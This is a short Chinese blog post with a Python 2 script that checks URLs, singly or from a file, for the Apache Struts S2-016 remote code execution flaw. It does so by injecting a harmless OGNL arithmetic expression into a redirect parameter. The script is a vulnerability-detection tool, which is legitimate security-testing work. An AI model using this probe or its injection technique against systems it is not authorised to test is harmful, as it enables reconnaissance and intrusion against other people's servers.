Struts S2-016 远程任意命令执行漏洞检测代码

前两天泛滥了Struts 的漏洞利用工具, 可参考 S2-016 和 Struts2再爆远程代码执行漏洞 , 当时写了一个很简单的 python 程序用来检测 url 是否存在此漏洞.
#!/usr/bin/env python
#coding=utf-8

'''
author: zz_d
date: 2013-07-17
'''

import sys
import urllib
import getopt


def help():
    print '%s [-f urlfile] [-u url] [-h]' % sys.argv[0]

def struts_test(url):
    turl = '%s?redirect:%%25{3*4}' % url
    rurl = '%s/12' % url[:url.rfind('/')]
    ur = urllib.urlopen(turl)
    if rurl == ur.url.split(';')[0]:
        ur.close()
        return True
    ur.close()
    return False
    
if __name__ == "__main__":
    
    url = None
    urlfile = None
    
    try:
        opts, args = getopt.getopt(sys.argv[1:], 'f:u:h')
    except getopt.GetoptError as err:
        print str(err)
        help()
        sys.exit(-1)
    
    for t, a in opts:
        if t == '-f':
            urlfile = a
        if t == '-u':
            url = a
        if t == '-h':
            help()
            sys.exit(0)
    if not url and not urlfile:
        help()
        sys.exit(-1)
        
    if url:
        if struts_test(url):
            print '%s is Vul' % url
    if urlfile:
        fs = open(urlfile, 'r')
        for line in fs:
            line = line.strip()
            if line:
                if struts_test(line):
                    print '%s is Vul' % line
使用时, url 设置为 "http://www.example.com/abc.action" 的形式. 
展开阅读全文

没有更多推荐了,返回首页